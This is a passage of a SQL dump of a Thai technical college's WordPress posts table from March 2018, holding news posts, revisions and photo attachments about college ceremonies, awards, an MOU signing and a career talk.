'inherit', 'closed', 'closed', '', '1851-revision-v1', '', '', '2018-03-15 09:31:42', '2018-03-15 02:31:42', '', 1851, 'http://www.technicrayong.ac.th/1851-revision-v1/', 0, 'revision', '', 0),
(1860, 3, '2018-03-15 09:59:06', '2018-03-15 02:59:06', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D555867054789487%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span></iframe></p>', '\"พิธีลงนามความร่วมมือ\" (MOU) เพื่อส่งเสริมและสนับสนุน ความร่วมมือด้านวิชาการและการแลกเปลี่ยนความรู้ด้านเทคนิค ระหว่าง บริษัท ต้าถุง (ประเทศไทย) จำกัด และ วิทยาลัยเทคนิคระยอง ในวันพุธที่ 14 มีนาคม 2561', '', 'inherit', 'closed', 'closed', '', '1851-revision-v1', '', '', '2018-03-15 09:59:06', '2018-03-15 02:59:06', '', 1851, 'http://www.technicrayong.ac.th/1851-revision-v1/', 0, 'revision', '', 0),
(1861, 3, '2018-03-15 10:56:11', '2018-03-15 03:56:11', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D540049919704534%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ขอแสดงความยินดีกับนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ที่ได้รับรางวัลในการประชุมวิชาการองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ครั้งที่ 27 การแข่งขันทักษะวิชาชีพ ทักษะพื้นฐาน ระดับชาติ ประจำปีการศึกษา 2560 ที่จัดขึ้นในระหว่างวันที่ 1-5 กุมภาพันธ์ 2561 ณ จังหวัดสุพรรณบุรี', '', 'publish', 'closed', 'open', '', '%e0%b8%82%e0%b8%ad%e0%b9%81%e0%b8%aa%e0%b8%94%e0%b8%87%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a2%e0%b8%b4%e0%b8%99%e0%b8%94%e0%b8%b5%e0%b8%81%e0%b8%b1%e0%b8%9a%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80', '', '', '2018-03-15 11:00:19', '2018-03-15 04:00:19', '', 0, 'http://www.technicrayong.ac.th/?p=1861', 452, 'post', '', 0),
(1862, 3, '2018-03-15 10:55:00', '2018-03-15 03:55:00', '', '27709438_540048929704633_7021054357732909465_o', '', 'inherit', 'closed', 'closed', '', '27709438_540048929704633_7021054357732909465_o', '', '', '2018-03-15 10:55:00', '2018-03-15 03:55:00', '', 1861, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/27709438_540048929704633_7021054357732909465_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1863, 3, '2018-03-15 10:56:11', '2018-03-15 03:56:11', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D540049919704534%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ขอแสดงความยินดีกับนักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ที่ได้รับรางวัลในการประชุมวิชาการองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ครั้งที่ 27 การแข่งขันทักษะวิชาชีพ ทักษะพื้นฐาน ระดับชาติ ประจำปีการศึกษา 2560 ที่จัดขึ้นในระหว่างวันที่ 1-5 กุมภาพันธ์ 2561 ณ จังหวัดสุพรรณบุรี', '', 'inherit', 'closed', 'closed', '', '1861-revision-v1', '', '', '2018-03-15 10:56:11', '2018-03-15 03:56:11', '', 1861, 'http://www.technicrayong.ac.th/1861-revision-v1/', 0, 'revision', '', 0),
(1864, 3, '2018-03-15 11:46:52', '2018-03-15 04:46:52', '<img class=\"aligncenter wp-image-1866 size-large\" src=\"/wp-content/uploads/2018/03/27908140_542857359423790_4485720651593021534_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1870 size-large\" src=\"/wp-content/uploads/2018/03/28060953_542857416090451_6553955049161507666_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1871 size-large\" src=\"/wp-content/uploads/2018/03/28070743_542857386090454_9058964697292876716_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1865 size-large\" src=\"/wp-content/uploads/2018/03/27798250_542868072756052_5701808612592798726_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1868 size-large\" src=\"/wp-content/uploads/2018/03/27983492_542861462756713_1646595961752838640_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1869 size-large\" src=\"/wp-content/uploads/2018/03/28060918_542865276089665_5592000227523744419_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1867 size-large\" src=\"/wp-content/uploads/2018/03/27913083_542857439423782_6534194945684348090_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1874 size-large\" src=\"/wp-content/uploads/2018/03/27907792_542865426089650_8530168288913954526_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1872 size-large\" src=\"/wp-content/uploads/2018/03/27797953_542867632756096_5061141651436011357_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1873 size-large\" src=\"/wp-content/uploads/2018/03/27798250_542868072756052_5701808612592798726_o-1-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h4><span style=\"color: #0000ff;\">รูปกิจกรรมเพิ่มเติม --></span> <a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.542857342757125.1073742106.100010985913485&type=3&pnref=story\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h4>', 'คณะผู้บริหาร นำโดย นายไสว สีบูจันดี ผู้อำนวยการวิทยาลัยเทคนิคระยอง รองผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียนนักศึกษา วิทยาลัยเทคนิคระยอง ร่วมพิธีไหว้องค์พระวิษณุกรรม ประจำปีการศึกษา 2560 วันพฤหัสบดีที่ 15 กุมภาพันธ์ 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3-%e0%b8%99%e0%b8%b3%e0%b9%82%e0%b8%94%e0%b8%a2-%e0%b8%99%e0%b8%b2%e0%b8%a2%e0%b9%84%e0%b8%aa', '', '', '2018-03-15 11:47:49', '2018-03-15 04:47:49', '', 0, 'http://www.technicrayong.ac.th/?p=1864', 451, 'post', '', 0),
(1865, 3, '2018-03-15 11:38:31', '2018-03-15 04:38:31', '', '27798250_542868072756052_5701808612592798726_o', '', 'inherit', 'closed', 'closed', '', '27798250_542868072756052_5701808612592798726_o', '', '', '2018-03-15 11:38:31', '2018-03-15 04:38:31', '', 1864, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/27798250_542868072756052_5701808612592798726_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1866, 3, '2018-03-15 11:38:36', '2018-03-15 04:38:36', '', '27908140_542857359423790_4485720651593021534_o', '', 'inherit', 'closed', 'closed', '', '27908140_542857359423790_4485720651593021534_o', '', '', '2018-03-15 11:38:36', '2018-03-15 04:38:36', '', 1864, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/27908140_542857359423790_4485720651593021534_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1867, 3, '2018-03-15 11:38:46', '2018-03-15 04:38:46', '', '27913083_542857439423782_6534194945684348090_o', '', 'inherit', 'closed', 'closed', '', '27913083_542857439423782_6534194945684348090_o', '', '', '2018-03-15 11:38:46', '2018-03-15 04:38:46', '', 1864, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/27913083_542857439423782_6534194945684348090_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1868, 3, '2018-03-15 11:38:49', '2018-03-15 04:38:49', '', '27983492_542861462756713_1646595961752838640_o', '', 'inherit', 'closed', 'closed', '', '27983492_542861462756713_1646595961752838640_o', '', '', '2018-03-15 11:38:49', '2018-03-15 04:38:49', '', 1864, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/27983492_542861462756713_1646595961752838640_o.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1869, 3, '2018-03-15 11:38:53', '2018-03-15 04:38:53', '', '28060918_542865276089665_5592000227523744419_o', '', 'inherit', 'closed', 'closed', '', '28060918_542865276089665_5592000227523744419_o', '', '', '2018-03-15 11:38:53', '2018-03-15 04:38:53', '', 1864, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28060918_542865276089665_5592000227523744419_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1870, 3, '2018-03-15 11:39:00', '2018-03-15 04:39:00', '', '28060953_542857416090451_6553955049161507666_o', '', 'inherit', 'closed', 'closed', '', '28060953_542857416090451_6553955049161507666_o', '', '', '2018-03-15 11:39:00', '2018-03-15 04:39:00', '', 1864, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28060953_542857416090451_6553955049161507666_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1871, 3, '2018-03-15 11:39:07', '2018-03-15 04:39:07', '', '28070743_542857386090454_9058964697292876716_o', '', 'inherit', 'closed', 'closed', '', '28070743_542857386090454_9058964697292876716_o', '', '', '2018-03-15 11:39:07', '2018-03-15 04:39:07', '', 1864, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28070743_542857386090454_9058964697292876716_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1872, 3, '2018-03-15 11:40:07', '2018-03-15 04:40:07', '', '27797953_542867632756096_5061141651436011357_o', '', 'inherit', 'closed', 'closed', '', '27797953_542867632756096_5061141651436011357_o', '', '', '2018-03-15 11:40:07', '2018-03-15 04:40:07', '', 1864, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/27797953_542867632756096_5061141651436011357_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1873, 3, '2018-03-15 11:40:12', '2018-03-15 04:40:12', '', '27798250_542868072756052_5701808612592798726_o', '', 'inherit', 'closed', 'closed', '', '27798250_542868072756052_5701808612592798726_o-2', '', '', '2018-03-15 11:40:12', '2018-03-15 04:40:12', '', 1864, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/27798250_542868072756052_5701808612592798726_o-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(1874, 3, '2018-03-15 11:40:18', '2018-03-15 04:40:18', '', '27907792_542865426089650_8530168288913954526_o', '', 'inherit', 'closed', 'closed', '', '27907792_542865426089650_8530168288913954526_o', '', '', '2018-03-15 11:40:18', '2018-03-15 04:40:18', '', 1864, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/27907792_542865426089650_8530168288913954526_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1875, 3, '2018-03-15 11:41:44', '2018-03-15 04:41:44', '<img class=\"aligncenter wp-image-1866 size-full\" src=\"/wp-content/uploads/2018/03/27908140_542857359423790_4485720651593021534_o.jpg\" alt=\"\" width=\"1296\" height=\"864\" />\r\n\r\n<img class=\"aligncenter wp-image-1870 size-full\" src=\"/wp-content/uploads/2018/03/28060953_542857416090451_6553955049161507666_o.jpg\" alt=\"\" width=\"1296\" height=\"864\" />\r\n\r\n<img class=\"aligncenter wp-image-1871 size-full\" src=\"/wp-content/uploads/2018/03/28070743_542857386090454_9058964697292876716_o.jpg\" alt=\"\" width=\"1296\" height=\"864\" />', 'คณะผู้บริหาร นำโดย นายไสว สีบูจันดี ผู้อำนวยการวิทยาลัยเทคนิคระยอง รองผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียนนักศึกษา วิทยาลัยเทคนิคระยอง ร่วมพิธีไหว้องค์พระวิษณุกรรม ประจำปีการศึกษา 2560 วันพฤหัสบดีที่ 15 กุมภาพันธ์ 2561', '', 'inherit', 'closed', 'closed', '', '1864-revision-v1', '', '', '2018-03-15 11:41:44', '2018-03-15 04:41:44', '', 1864, 'http://www.technicrayong.ac.th/1864-revision-v1/', 0, 'revision', '', 0),
(1876, 3, '2018-03-15 11:46:52', '2018-03-15 04:46:52', '<img class=\"aligncenter wp-image-1866 size-large\" src=\"/wp-content/uploads/2018/03/27908140_542857359423790_4485720651593021534_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1870 size-large\" src=\"/wp-content/uploads/2018/03/28060953_542857416090451_6553955049161507666_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1871 size-large\" src=\"/wp-content/uploads/2018/03/28070743_542857386090454_9058964697292876716_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1865 size-large\" src=\"/wp-content/uploads/2018/03/27798250_542868072756052_5701808612592798726_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1868 size-large\" src=\"/wp-content/uploads/2018/03/27983492_542861462756713_1646595961752838640_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1869 size-large\" src=\"/wp-content/uploads/2018/03/28060918_542865276089665_5592000227523744419_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1867 size-large\" src=\"/wp-content/uploads/2018/03/27913083_542857439423782_6534194945684348090_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1874 size-large\" src=\"/wp-content/uploads/2018/03/27907792_542865426089650_8530168288913954526_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1872 size-large\" src=\"/wp-content/uploads/2018/03/27797953_542867632756096_5061141651436011357_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1873 size-large\" src=\"/wp-content/uploads/2018/03/27798250_542868072756052_5701808612592798726_o-1-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h4><span style=\"color: #0000ff;\">รูปกิจกรรมเพิ่มเติม --></span> <a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.542857342757125.1073742106.100010985913485&type=3&pnref=story\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h4>', 'คณะผู้บริหาร นำโดย นายไสว สีบูจันดี ผู้อำนวยการวิทยาลัยเทคนิคระยอง รองผู้บริหาร ครู บุคลากรทางการศึกษา และนักเรียนนักศึกษา วิทยาลัยเทคนิคระยอง ร่วมพิธีไหว้องค์พระวิษณุกรรม ประจำปีการศึกษา 2560 วันพฤหัสบดีที่ 15 กุมภาพันธ์ 2561', '', 'inherit', 'closed', 'closed', '', '1864-revision-v1', '', '', '2018-03-15 11:46:52', '2018-03-15 04:46:52', '', 1864, 'http://www.technicrayong.ac.th/1864-revision-v1/', 0, 'revision', '', 0),
(1877, 3, '2018-03-15 11:54:49', '2018-03-15 04:54:49', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D546128922429967%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ได้รับเกียรติจากคุณคงรัฐ อิศรพร บริษัท ซูเปอร์ เรซูเม่ จำกัด มาบรรยายให้นักเรียน นักศึกษา ในหัวข้อ\"การเขียนเรซูเม่อย่างไรให้ได้งาน\"ในการปัจฉิมนิเทศนักเรียน นักศึกษา ประจำปีการศึกษา 2560 วันพุธที่ 21 กุมภาพันธ์ 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%b1%e0%b8%88%e0%b8%89%e0%b8%b4%e0%b8%a1%e0%b8%99%e0%b8%b4%e0%b9%80%e0%b8%97%e0%b8%a8-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99', '', '', '2018-03-15 11:59:49', '2018-03-15 04:59:49', '', 0, 'http://www.technicrayong.ac.th/?p=1877', 450, 'post', '', 0),
(1878, 3, '2018-03-15 11:54:36', '2018-03-15 04:54:36', '', '28337764_546126165763576_3442392900285698398_o', '', 'inherit', 'closed', 'closed', '', '28337764_546126165763576_3442392900285698398_o', '', '', '2018-03-15 11:54:36', '2018-03-15 04:54:36', '', 1877, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28337764_546126165763576_3442392900285698398_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1879, 3, '2018-03-15 11:54:49', '2018-03-15 04:54:49', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D546128922429967%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'การปัจฉิมนิเทศ นักเรียน นักศึกษา ประจำปีการศึกษา 2560 โดยได้รับเกียรติจากคุณคงรัฐ อิศรพร บริษัท ซูเปอร์ เรซูเม่ จำกัด มาบรรยายให้นักเรียน นักศึกษาในหัวข้อ การเขียนเรซูเม่อย่างไรให้ได้งาน วันพุธที่ 21 กุมภาพันธ์ 2561', '', 'inherit', 'closed', 'closed', '', '1877-revision-v1', '', '', '2018-03-15 11:54:49', '2018-03-15 04:54:49', '', 1877, 'http://www.technicrayong.ac.th/1877-revision-v1/', 0, 'revision', '', 0),
(1880, 3, '2018-03-15 11:59:44', '2018-03-15 04:59:44', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D546128922429967%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ได้รับเกียรติจากคุณคงรัฐ อิศรพร บริษัท ซูเปอร์ เรซูเม่ จำกัด มาบรรยายให้นักเรียน นักศึกษา ในหัวข้อ\"การเขียนเรซูเม่อย่างไรให้ได้งาน\"ในการปัจฉิมนิเทศนักเรียน นักศึกษา ประจำปีการศึกษา 2560 วันพุธที่ 21 กุมภาพันธ์ 2561', '', 'inherit', 'closed', 'closed', '', '1877-autosave-v1', '', '', '2018-03-15 11:59:44', '2018-03-15 04:59:44', '', 1877, 'http://www.technicrayong.ac.th/1877-autosave-v1/', 0, 'revision', '', 0),
(1881, 3, '2018-03-15 11:59:49', '2018-03-15 04:59:49', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D546128922429967%26id%3D100010985913485&width=500\" width=\"500\" height=\"759\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ได้รับเกียรติจากคุณคงรัฐ อิศรพร บริษัท ซูเปอร์ เรซูเม่ จำกัด มาบรรยายให้นักเรียน นักศึกษา ในหัวข้อ\"การเขียนเรซูเม่อย่างไรให้ได้งาน\"ในการปัจฉิมนิเทศนักเรียน นักศึกษา ประจำปีการศึกษา 2560 วันพุธที่ 21 กุมภาพันธ์ 2561', '', 'inherit', 'closed', 'closed', '', '1877-revision-v1', '', '', '2018-03-15 11:59:49', '2018-03-15 04:59:49', '', 1877, 'http://www.technicrayong.ac.th/1877-revision-v1/', 0, 'revision', '', 0),
(1882, 3, '2018-03-15 12:52:05', '2018-03-15 05:52:05', '<img class=\"aligncenter wp-image-1887 size-large\" src=\"/wp-content/uploads/2018/03/28471494_550052755370917_165237536589873152_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1889 size-large\" src=\"/wp-content/uploads/2018/03/28576547_550052162037643_702948303674802176_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1891 size-large\" src=\"/wp-content/uploads/2018/03/28660448_550061188703407_169774164515749888_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1886 size-large\" src=\"/wp-content/uploads/2018/03/28468726_550052725370920_2177750102146285568_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1884 size-large\" src=\"/wp-content/uploads/2018/03/28379794_550062678703258_1361089425458593792_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1888 size-large\" src=\"/wp-content/uploads/2018/03/28576414_550062942036565_62988530074255360_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1892 size-large\" src=\"/wp-content/uploads/2018/03/28660485_550063245369868_1310164333237370880_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1885 size-large\" src=\"/wp-content/uploads/2018/03/28468617_550061042036755_8607802566484426752_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1890 size-large\" src=\"/wp-content/uploads/2018/03/28577859_550061232036736_1955049390649376768_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter wp-image-1883 size-large\" src=\"/wp-content/uploads/2018/03/28378287_550052688704257_3586775167969263616_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h4><span style=\"color: #0000ff;\">รูปกิจกรรมเพิ่มเติม--></span> <a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.550061958703330&type=3&pnref=story\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h4>\r\n ', 'พิธีเปิดโครงการขยายโอกาสการศึกษาวิชาชีพและพัฒนาทักษะวิชาชีพ เพื่อเตรียมความพร้อมเข้าสู่ตลาดแรงงาน กิจกรรมพัฒนารูปแบบและยกระดับ ศูนย์ซ่อมสร้างเพื่อชุมชน (Fix It Center Thailand 4.0) โดยได้รับเกียรติจากท่าน กิตติ เกียรติ์มนตรี รองนายกองค์การบริหารส่วนจังหวัดระยอง มาเป็นประธานในพิธีเปิด วันศุกร์ที่ 2 มีนาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9e%e0%b8%b4%e0%b8%98%e0%b8%b5%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%82%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b9%82%e0%b8%ad%e0%b8%81', '', '', '2018-03-15 12:52:05', '2018-03-15 05:52:05', '', 0, 'http://www.technicrayong.ac.th/?p=1882', 449, 'post', '', 0),
(1883, 3, '2018-03-15 12:09:28', '2018-03-15 05:09:28', '', '28378287_550052688704257_3586775167969263616_o', '', 'inherit', 'closed', 'closed', '', '28378287_550052688704257_3586775167969263616_o', '', '', '2018-03-15 12:09:28', '2018-03-15 05:09:28', '', 1882, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28378287_550052688704257_3586775167969263616_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1884, 3, '2018-03-15 12:09:33', '2018-03-15 05:09:33', '', '28379794_550062678703258_1361089425458593792_o', '', 'inherit', 'closed', 'closed', '', '28379794_550062678703258_1361089425458593792_o', '', '', '2018-03-15 12:09:33', '2018-03-15 05:09:33', '', 1882, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28379794_550062678703258_1361089425458593792_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1885, 3, '2018-03-15 12:09:39', '2018-03-15 05:09:39', '', '28468617_550061042036755_8607802566484426752_o', '', 'inherit', 'closed', 'closed', '', '28468617_550061042036755_8607802566484426752_o', '', '', '2018-03-15 12:09:39', '2018-03-15 05:09:39', '', 1882, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28468617_550061042036755_8607802566484426752_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1886, 3, '2018-03-15 12:09:44', '2018-03-15 05:09:44', '', '28468726_550052725370920_2177750102146285568_o', '', 'inherit', 'closed', 'closed', '', '28468726_550052725370920_2177750102146285568_o', '', '', '2018-03-15 12:09:44', '2018-03-15 05:09:44', '', 1882, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28468726_550052725370920_2177750102146285568_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1887, 3, '2018-03-15 12:09:47', '2018-03-15 05:09:47', '', '28471494_550052755370917_165237536589873152_o', '', 'inherit', 'closed', 'closed', '', '28471494_550052755370917_165237536589873152_o', '', '', '2018-03-15 12:09:47', '2018-03-15 05:09:47', '', 1882, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28471494_550052755370917_165237536589873152_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1888, 3, '2018-03-15 12:09:50', '2018-03-15 05:09:50', '', '28576414_550062942036565_62988530074255360_o', '', 'inherit', 'closed', 'closed', '', '28576414_550062942036565_62988530074255360_o', '', '', '2018-03-15 12:09:50', '2018-03-15 05:09:50', '', 1882, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28576414_550062942036565_62988530074255360_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1889, 3, '2018-03-15 12:10:01', '2018-03-15 05:10:01', '', '28576547_550052162037643_702948303674802176_o', '', 'inherit', 'closed', 'closed', '', '28576547_550052162037643_702948303674802176_o', '', '', '2018-03-15 12:10:01', '2018-03-15 05:10:01', '', 1882, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28576547_550052162037643_702948303674802176_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1890, 3, '2018-03-15 12:10:04', '2018-03-15 05:10:04', '', '28577859_550061232036736_1955049390649376768_o', '', 'inherit', 'closed', 'closed', '', '28577859_550061232036736_1955049390649376768_o', '', '', '2018-03-15 12:10:04', '2018-03-15 05:10:04', '', 1882, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28577859_550061232036736_1955049390649376768_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1891, 3, '2018-03-15 12:10:07', '2018-03-15 05:10:07', '', '28660448_550061188703407_169774164515749888_o', '', 'inherit', 'closed', 'closed', '', '28660448_550061188703407_169774164515749888_o', '', '', '2018-03-15 12:10:07', '2018-03-15 05:10:07', '', 1882, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28660448_550061188703407_169774164515749888_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(1892, 3, '2018-03-15 12:10:15', '2018-03-15 05:10:15', '', '28660485_550063245369868_1310164333237370880_o', '', 'inherit', 'closed', 'closed', '', '28660485_550063245369868_1310164333237370880_o', '', '', '2018-03-15 12:10:15', '2018-03-15 05:10:15', '', 1882, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/28660485_550063245369868_1310164333237370880_o.jpg', 0, 'attachment', 'image/jpeg', 0),
